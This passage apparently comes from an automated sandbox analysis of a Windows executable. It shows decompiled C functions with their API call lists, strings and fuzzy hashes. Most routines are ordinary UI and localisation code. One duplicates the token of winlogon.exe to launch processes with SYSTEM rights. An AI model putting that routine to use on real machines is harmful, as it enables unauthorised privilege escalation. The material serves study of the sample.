                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                      • #17.COMCTL32(?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403190
                                                                                      • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: Library$AddressFreeLoadMessageProc
                                                                                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                      • API String ID: 2780580303-317687271
                                                                                      • Opcode ID: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                      • Instruction ID: 155fb52d9805f4d7e0650ae201b0fcd9156dc3619c14d31e00ff2d1348fe2513
                                                                                      • Opcode Fuzzy Hash: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                      • Instruction Fuzzy Hash: 5A01D672751201EAD3115FB4AC89F7B7EACDF4974AB00023AF505F51C0DA78DA01869C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 85%
                                                                                      			E00404DA9(void* __edx, struct HWND__* _a4, signed int _a8) {
                                                                                      				struct HWND__* _v8;
                                                                                      				struct HWND__* _v12;
                                                                                      				struct tagRECT _v28;
                                                                                      				struct tagRECT _v44;
                                                                                      				int _t50;
                                                                                      				long _t61;
                                                                                      				struct HDC__* _t63;
                                                                                      				intOrPtr _t65;
                                                                                      				intOrPtr _t68;
                                                                                      				struct HWND__* _t71;
                                                                                      				intOrPtr _t72;
                                                                                      				void* _t73;
                                                                                      				int _t74;
                                                                                      				int _t80;
                                                                                      				int _t83;
                                                                                      
                                                                                      				_t73 = __edx;
                                                                                      				_v8 = 0;
                                                                                      				_v12 = 0;
                                                                                      				_t74 = GetSystemMetrics(0x11);
                                                                                      				_t80 = GetSystemMetrics(0x10);
                                                                                      				if(_t74 == 0 || _t80 == 0) {
                                                                                      					_t63 = GetDC(0);
                                                                                      					_t80 = GetDeviceCaps(_t63, 8);
                                                                                      					_t74 = GetDeviceCaps(_t63, 0xa);
                                                                                      					ReleaseDC(0, _t63);
                                                                                      				}
                                                                                      				GetWindowRect(_a4,  &_v44);
                                                                                      				if((_a8 & 0x00000004) != 0) {
                                                                                      					_t71 = GetParent(_a4);
                                                                                      					if(_t71 != 0) {
                                                                                      						_v28.left = _v28.left & 0x00000000;
                                                                                      						asm("stosd");
                                                                                      						asm("stosd");
                                                                                      						asm("stosd");
                                                                                      						GetWindowRect(_t71,  &_v28);
                                                                                      						_t61 = _v28.left;
                                                                                      						_t72 = _v28.top;
                                                                                      						_t80 = _v28.right - _t61 + 1;
                                                                                      						_t74 = _v28.bottom - _t72 + 1;
                                                                                      						_v8 = _t61;
                                                                                      						_v12 = _t72;
                                                                                      					}
                                                                                      				}
                                                                                      				_t65 = _v44.right;
                                                                                      				if((_a8 & 0x00000001) == 0) {
                                                                                      					asm("cdq");
                                                                                      					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
                                                                                      				} else {
                                                                                      					_t83 = 0;
                                                                                      				}
                                                                                      				_t68 = _v44.bottom;
                                                                                      				if((_a8 & 0x00000002) != 0) {
                                                                                      					L11:
                                                                                      					_t50 = 0;
                                                                                      					goto L12;
                                                                                      				} else {
                                                                                      					asm("cdq");
                                                                                      					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
                                                                                      					if(_t50 >= 0) {
                                                                                      						L12:
                                                                                      						if(_t83 < 0) {
                                                                                      							_t83 = 0;
                                                                                      						}
                                                                                      						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
                                                                                      					}
                                                                                      					goto L11;
                                                                                      				}
                                                                                      			}

                                                                                      APIs
                                                                                      • GetSystemMetrics.USER32 ref: 00404DC2
                                                                                      • GetSystemMetrics.USER32 ref: 00404DC8
                                                                                      • GetDC.USER32(00000000), ref: 00404DD5
                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 00404DE6
                                                                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00404DED
                                                                                      • ReleaseDC.USER32 ref: 00404DF4
                                                                                      • GetWindowRect.USER32 ref: 00404E07
                                                                                      • GetParent.USER32(?), ref: 00404E12
                                                                                      • GetWindowRect.USER32 ref: 00404E2F
                                                                                      • MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00404E9E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                      • String ID:
                                                                                      • API String ID: 2163313125-0
                                                                                      • Opcode ID: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                      • Instruction ID: fcbc432c8b17a9ec8ea4481816a0c35ab2ad0e4d246cd47a42b035ba49fba047
                                                                                      • Opcode Fuzzy Hash: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                      • Instruction Fuzzy Hash: D63197B1900219AFDB10DFB8CD84AEEBBB8EB44314F054179EE05B7291D674AD418B94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 88%
                                                                                      			E00406398(void* __eflags, wchar_t* _a4) {
                                                                                      				void* __esi;
                                                                                      				void* _t3;
                                                                                      				int _t6;
                                                                                      
                                                                                      				_t3 = E00404AAA(_a4);
                                                                                      				if(_t3 != 0) {
                                                                                      					wcscpy(0x40fb90, _a4);
                                                                                      					wcscpy(0x40fda0, L"general");
                                                                                      					_t6 = GetPrivateProfileIntW(0x40fda0, L"rtl", 0, 0x40fb90);
                                                                                      					asm("sbb eax, eax");
                                                                                      					 *0x40fe28 =  ~(_t6 - 1) + 1;
                                                                                      					E00405F14(0x40fe30, L"charset", 0x3f);
                                                                                      					E00405F14(0x40feb0, L"TranslatorName", 0x3f);
                                                                                      					return E00405F14(0x40ff30, L"TranslatorURL", 0xff);
                                                                                      				}
                                                                                      				return _t3;
                                                                                      			}

                                                                                      APIs
                                                                                        • Part of subcall function 00404AAA: GetFileAttributesW.KERNEL32(?,004063A1,?,00406458,00000000,?,00000000,00000208,?), ref: 00404AAE
                                                                                      • wcscpy.MSVCRT ref: 004063B2
                                                                                      • wcscpy.MSVCRT ref: 004063C2
                                                                                      • GetPrivateProfileIntW.KERNEL32 ref: 004063D3
                                                                                        • Part of subcall function 00405F14: GetPrivateProfileStringW.KERNEL32 ref: 00405F30
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                      • API String ID: 3176057301-2039793938
                                                                                      • Opcode ID: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                      • Instruction ID: e4db3026d56c82c297763cb3084dd600e002768b85b35a6fcc1e36585c673314
                                                                                      • Opcode Fuzzy Hash: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                      • Instruction Fuzzy Hash: E2F09032EA422276EA203321DC4BF2B2555CBD1B18F15417BBA08BA5D3DB7C580645ED
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 16%
                                                                                      			E0040ADF1(signed short* __eax, void* __ecx) {
                                                                                      				void* _t2;
                                                                                      				signed short* _t3;
                                                                                      				void* _t7;
                                                                                      				void* _t8;
                                                                                      				void* _t10;
                                                                                      
                                                                                      				_t3 = __eax;
                                                                                      				_t8 = __ecx;
                                                                                      				_t7 = 8;
                                                                                      				while(1) {
                                                                                      					_t2 =  *_t3 & 0x0000ffff;
                                                                                      					if(_t2 != 0x3c) {
                                                                                      						goto L3;
                                                                                      					}
                                                                                      					_push(_t7);
                                                                                      					_push(L"&lt;");
                                                                                      					L14:
                                                                                      					_t2 = memcpy(_t8, ??, ??);
                                                                                      					_t10 = _t10 + 0xc;
                                                                                      					_t8 = _t8 + _t7;
                                                                                      					L16:
                                                                                      					if( *_t3 != 0) {
                                                                                      						_t3 =  &(_t3[1]);
                                                                                      						continue;
                                                                                      					}
                                                                                      					return _t2;
                                                                                      					L3:
                                                                                      					if(_t2 != 0x3e) {
                                                                                      						if(_t2 != 0x22) {
                                                                                      							if((_t2 & 0x0000ffff) != 0xffffffb0) {
                                                                                      								if(_t2 != 0x26) {
                                                                                      									if(_t2 != 0xa) {
                                                                                      										 *_t8 = _t2;
                                                                                      										_t8 = _t8 + 2;
                                                                                      									} else {
                                                                                      										_push(_t7);
                                                                                      										_push(L"<br>");
                                                                                      										goto L14;
                                                                                      									}
                                                                                      								} else {
                                                                                      									_push(0xa);
                                                                                      									_push(L"&amp;");
                                                                                      									goto L11;
                                                                                      								}
                                                                                      							} else {
                                                                                      								_push(0xa);
                                                                                      								_push(L"&deg;");
                                                                                      								L11:
                                                                                      								_t2 = memcpy(_t8, ??, ??);
                                                                                      								_t10 = _t10 + 0xc;
                                                                                      								_t8 = _t8 + 0xa;
                                                                                      							}
                                                                                      						} else {
                                                                                      							_t2 = memcpy(_t8, L"&quot;", 0xc);
                                                                                      							_t10 = _t10 + 0xc;
                                                                                      							_t8 = _t8 + 0xc;
                                                                                      						}
                                                                                      					} else {
                                                                                      						_push(_t7);
                                                                                      						_push(L"&gt;");
                                                                                      						goto L14;
                                                                                      					}
                                                                                      					goto L16;
                                                                                      				}
                                                                                      			}









                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: memcpy
                                                                                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004041EB(intOrPtr* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
                                                                                      				struct HDWP__* _v8;
                                                                                      				intOrPtr* _v12;
                                                                                      				void _v534;
                                                                                      				short _v536;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				intOrPtr _t42;
                                                                                      				intOrPtr* _t95;
                                                                                      				RECT* _t96;
                                                                                      
                                                                                      				_t95 = __ecx;
                                                                                      				_v12 = __ecx;
                                                                                      				if(_a4 == 0x233) {
                                                                                      					_v536 = 0;
                                                                                      					memset( &_v534, 0, 0x208);
                                                                                      					DragQueryFileW(_a8, 0,  &_v536, 0x104);
                                                                                      					DragFinish(_a8);
                                                                                      					 *((intOrPtr*)( *_t95 + 4))(0);
                                                                                      					E00404923(0x104, _t95 + 0x1680,  &_v536);
                                                                                      					 *((intOrPtr*)( *_v12 + 4))(1);
                                                                                      					_t95 = _v12;
                                                                                      				}
                                                                                      				if(_a4 != 5) {
                                                                                      					if(_a4 != 0xf) {
                                                                                      						if(_a4 == 0x24) {
                                                                                      							_t42 = _a12;
                                                                                      							 *((intOrPtr*)(_t42 + 0x18)) = 0x1f4;
                                                                                      							 *((intOrPtr*)(_t42 + 0x1c)) = 0x12c;
                                                                                      						}
                                                                                      					} else {
                                                                                      						E00402EC8(_t95 + 0x40);
                                                                                      					}
                                                                                      				} else {
                                                                                      					_v8 = BeginDeferWindowPos(0xd);
                                                                                      					_t96 = _t95 + 0x40;
                                                                                      					E00402E22(_t96, _t44, 0x401, 1, 1, 0, 0);
                                                                                      					E00402E22(_t96, _v8, 2, 1, 1, 0, 0);
                                                                                      					E00402E22(_t96, _v8, 0x419, 1, 1, 0, 0);
                                                                                      					E00402E22(_t96, _v8, 0x40f, 1, 1, 0, 0);
                                                                                      					E00402E22(_t96, _v8, 0x40e, 1, 1, 0, 0);
                                                                                      					E00402E22(_t96, _v8, 0x40d, 1, 1, 0, 0);
                                                                                      					E00402E22(_t96, _v8, 0x3fb, 0, 0, 1, 1);
                                                                                      					E00402E22(_t96, _v8, 0x3fd, 0, 0, 1, 1);
                                                                                      					E00402E22(_t96, _v8, 0x402, 0, 0, 1, 0);
                                                                                      					E00402E22(_t96, _v8, 0x3e9, 0, 0, 1, 0);
                                                                                      					E00402E22(_t96, _v8, 0x3ea, 0, 0, 1, 0);
                                                                                      					E00402E22(_t96, _v8, 0x3ee, 1, 0, 0, 0);
                                                                                      					E00402E22(_t96, _v8, 0x3f3, 1, 0, 0, 0);
                                                                                      					E00402E22(_t96, _v8, 0x404, 0, 0, 1, 0);
                                                                                      					E00402E22(_t96, _v8, 0x3f6, 1, 0, 0, 0);
                                                                                      					EndDeferWindowPos(_v8);
                                                                                      					InvalidateRect( *(_t96 + 0x10), _t96, 1);
                                                                                      					_t95 = _v12;
                                                                                      				}
                                                                                      				return E00402CED(_t95, _a4, _a8, _a12);
                                                                                      			}













                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0040421E
                                                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00404236
                                                                                      • DragFinish.SHELL32(?), ref: 0040423F
                                                                                        • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                        • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                        • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                        • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                        • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                      • BeginDeferWindowPos.USER32 ref: 0040427D
                                                                                      • EndDeferWindowPos.USER32(?), ref: 004043A4
                                                                                      • InvalidateRect.USER32(?,?,00000001), ref: 004043AF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: DeferWindow$DragRect$BeginClientFileFinishInvalidateItemQuerymemcpymemsetwcslen
                                                                                      • String ID: $
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 55%
                                                                                      			E00405B81(signed short __ebx) {
                                                                                      				signed int _t21;
                                                                                      				void* _t22;
                                                                                      				struct HINSTANCE__* _t25;
                                                                                      				signed int _t27;
                                                                                      				void* _t35;
                                                                                      				signed short _t39;
                                                                                      				signed int _t40;
                                                                                      				void* _t57;
                                                                                      				int _t61;
                                                                                      				void* _t62;
                                                                                      				int _t71;
                                                                                      
                                                                                      				_t39 = __ebx;
                                                                                      				if( *0x41c470 == 0) {
                                                                                      					E00405ADF();
                                                                                      				}
                                                                                      				_t40 =  *0x41c468;
                                                                                      				_t21 = 0;
                                                                                      				if(_t40 <= 0) {
                                                                                      					L5:
                                                                                      					_t57 = 0;
                                                                                      				} else {
                                                                                      					while(_t39 !=  *((intOrPtr*)( *0x41c460 + _t21 * 4))) {
                                                                                      						_t21 = _t21 + 1;
                                                                                      						if(_t21 < _t40) {
                                                                                      							continue;
                                                                                      						} else {
                                                                                      							goto L5;
                                                                                      						}
                                                                                      						goto L6;
                                                                                      					}
                                                                                      					_t57 =  *0x41c458 +  *( *0x41c464 + _t21 * 4) * 2;
                                                                                      				}
                                                                                      				L6:
                                                                                      				if(_t57 != 0) {
                                                                                      					L21:
                                                                                      					_t22 = _t57;
                                                                                      				} else {
                                                                                      					if((_t39 & 0x00010000) == 0) {
                                                                                      						if( *0x40fb90 == 0) {
                                                                                      							_push( *0x41c478 - 1);
                                                                                      							_push( *0x41c45c);
                                                                                      							_push(_t39);
                                                                                      							_t25 = E00405CE7();
                                                                                      							goto L15;
                                                                                      						} else {
                                                                                      							wcscpy(0x40fda0, L"strings");
                                                                                      							_t35 = E00405EDD(_t39,  *0x41c45c);
                                                                                      							_t62 = _t62 + 0x10;
                                                                                      							if(_t35 == 0) {
                                                                                      								L13:
                                                                                      								_t25 = GetModuleHandleW(0);
                                                                                      								_push( *0x41c478 - 1);
                                                                                      								_push( *0x41c45c);
                                                                                      								_push(_t39);
                                                                                      								goto L15;
                                                                                      							} else {
                                                                                      								_t61 = wcslen( *0x41c45c);
                                                                                      								if(_t61 == 0) {
                                                                                      									goto L13;
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      					} else {
                                                                                      						_t25 = GetModuleHandleW(_t57);
                                                                                      						_push( *0x41c478 - 1);
                                                                                      						_push( *0x41c45c);
                                                                                      						_push(_t39 & 0x0000ffff);
                                                                                      						L15:
                                                                                      						_t61 = LoadStringW(_t25, ??, ??, ??);
                                                                                      						_t71 = _t61;
                                                                                      					}
                                                                                      					if(_t71 <= 0) {
                                                                                      						L20:
                                                                                      						_t22 = 0x40c4e8;
                                                                                      					} else {
                                                                                      						_t27 =  *0x41c46c;
                                                                                      						if(_t27 + _t61 + 2 >=  *0x41c470 ||  *0x41c468 >=  *0x41c474) {
                                                                                      							goto L20;
                                                                                      						} else {
                                                                                      							_t57 =  *0x41c458 + _t27 * 2;
                                                                                      							_t14 = _t61 + 2; // 0x2
                                                                                      							memcpy(_t57,  *0x41c45c, _t61 + _t14);
                                                                                      							 *( *0x41c464 +  *0x41c468 * 4) =  *0x41c46c;
                                                                                      							 *( *0x41c460 +  *0x41c468 * 4) = _t39;
                                                                                      							 *0x41c468 =  *0x41c468 + 1;
                                                                                      							 *0x41c46c =  *0x41c46c + _t61 + 1;
                                                                                      							if(_t57 != 0) {
                                                                                      								goto L21;
                                                                                      							} else {
                                                                                      								goto L20;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      				return _t22;
                                                                                      			}

                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                      • wcscpy.MSVCRT ref: 00405C02
                                                                                        • Part of subcall function 00405EDD: memset.MSVCRT ref: 00405EF0
                                                                                        • Part of subcall function 00405EDD: _itow.MSVCRT ref: 00405EFE
                                                                                      • wcslen.MSVCRT ref: 00405C20
                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                      • LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                      • memcpy.MSVCRT ref: 00405C99
                                                                                        • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B19
                                                                                        • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B37
                                                                                        • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B55
                                                                                        • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B73
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                      • String ID: strings
                                                                                      • API String ID: 3166385802-3030018805
                                                                                      • Opcode ID: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                      • Instruction ID: 6100db9a332bdf9cdae47e625800c2dd81fdb4e1827941160d8c77da4bb91491
                                                                                      • Opcode Fuzzy Hash: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                      • Instruction Fuzzy Hash: F0417A74188A149FEB149B54ECE5DB73376F785708720813AE802A72A1DB39AC46CF6C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 75%
                                                                                      			E00401E44(int _a4, int _a8, intOrPtr* _a12) {
                                                                                      				char _v8;
                                                                                      				void* _v12;
                                                                                      				void* __esi;
                                                                                      				void* _t18;
                                                                                      				intOrPtr* _t22;
                                                                                      				void* _t23;
                                                                                      				void* _t28;
                                                                                      				int _t37;
                                                                                      				intOrPtr* _t39;
                                                                                      				intOrPtr* _t40;
                                                                                      
                                                                                      				_v8 = 0;
                                                                                      				_t18 = OpenProcess(0x2000000, 0, _a8);
                                                                                      				_v12 = _t18;
                                                                                      				if(_t18 == 0) {
                                                                                      					_t37 = GetLastError();
                                                                                      				} else {
                                                                                      					_t39 = _a4 + 0x800;
                                                                                      					_a8 = 0;
                                                                                      					E0040289F(_t39);
                                                                                      					_t22 =  *((intOrPtr*)(_t39 + 4));
                                                                                      					if(_t22 == 0) {
                                                                                      						_t23 = 0;
                                                                                      					} else {
                                                                                      						_t23 =  *_t22(_v12, 2,  &_a8);
                                                                                      					}
                                                                                      					if(_t23 == 0) {
                                                                                      						_t37 = GetLastError();
                                                                                      					} else {
                                                                                      						_a4 = _a8;
                                                                                      						E0040289F(_t39);
                                                                                      						_t40 =  *((intOrPtr*)(_t39 + 8));
                                                                                      						if(_t40 == 0) {
                                                                                      							_t28 = 0;
                                                                                      						} else {
                                                                                      							_t28 =  *_t40(_a4, 0x2000000, 0, 2, 1,  &_v8);
                                                                                      						}
                                                                                      						if(_t28 == 0) {
                                                                                      							_t37 = GetLastError();
                                                                                      						} else {
                                                                                      							 *_a12 = _v8;
                                                                                      							_t37 = 0;
                                                                                      						}
                                                                                      						CloseHandle(_a8);
                                                                                      					}
                                                                                      					CloseHandle(_v12);
                                                                                      				}
                                                                                      				return _t37;
                                                                                      			}

                                                                                      APIs
                                                                                      • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EF3
                                                                                        • Part of subcall function 0040289F: LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                        • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                        • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                        • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                        • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401ECD
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EE0
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: AddressProc$ErrorLast$CloseHandle$LibraryLoadOpenProcess
                                                                                      • String ID: winlogon.exe
                                                                                      • API String ID: 1315556178-961692650
                                                                                      • Opcode ID: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                      • Instruction ID: 37dd24dd8946aa7f8aa4240fd04c0d288f38f50501b3184a6b0aa07a3247aa85
                                                                                      • Opcode Fuzzy Hash: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                      • Instruction Fuzzy Hash: FB212932900114EFDB10AFA5CDC8AAE7BB5EB04350F14893AFE06F72A0D7749D41DA94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 79%
                                                                                      			E00405236(short* __ebx, intOrPtr _a4) {
                                                                                      				int _v8;
                                                                                      				char _v12;
                                                                                      				void _v2058;
                                                                                      				void _v2060;
                                                                                      				int _t35;
                                                                                      				int _t41;
                                                                                      				signed int _t48;
                                                                                      				signed int _t49;
                                                                                      				signed short* _t50;
                                                                                      				void** _t52;
                                                                                      				void* _t53;
                                                                                      				void* _t54;
                                                                                      
                                                                                      				_t48 = 0;
                                                                                      				_v2060 = 0;
                                                                                      				memset( &_v2058, 0, 0x7fe);
                                                                                      				_t54 = _t53 + 0xc;
                                                                                      				 *__ebx = 0;
                                                                                      				_t52 = _a4 + 4;
                                                                                      				_v12 = 2;
                                                                                      				do {
                                                                                      					_push( *_t52);
                                                                                      					_t6 = _t52 - 4; // 0xe80040cb
                                                                                      					_push( *_t6);
                                                                                      					_push(L"%s (%s)");
                                                                                      					_push(0x400);
                                                                                      					_push( &_v2060);
                                                                                      					L0040B1EC();
                                                                                      					_t35 = wcslen( &_v2060);
                                                                                      					_v8 = _t35;
                                                                                      					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
                                                                                      					_t49 = _t48 + _v8 + 1;
                                                                                      					_t41 = wcslen( *_t52);
                                                                                      					_v8 = _t41;
                                                                                      					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
                                                                                      					_t54 = _t54 + 0x34;
                                                                                      					_t52 =  &(_t52[2]);
                                                                                      					_t23 =  &_v12;
                                                                                      					 *_t23 = _v12 - 1;
                                                                                      					_t48 = _t49 + _v8 + 1;
                                                                                      				} while ( *_t23 != 0);
                                                                                      				_t50 = __ebx + _t48 * 2;
                                                                                      				 *_t50 =  *_t50 & 0x00000000;
                                                                                      				_t50[1] = _t50[1] & 0x00000000;
                                                                                      				return __ebx;
                                                                                      			}
















                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: memcpywcslen$_snwprintfmemset
                                                                                      • String ID: %s (%s)
                                                                                      • API String ID: 3979103747-1363028141
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 78%
                                                                                      			E0040614F(void* __ecx, void* __eflags, struct HWND__* _a4) {
                                                                                      				void _v514;
                                                                                      				short _v516;
                                                                                      				void _v8710;
                                                                                      				short _v8712;
                                                                                      				int _t17;
                                                                                      				WCHAR* _t26;
                                                                                      
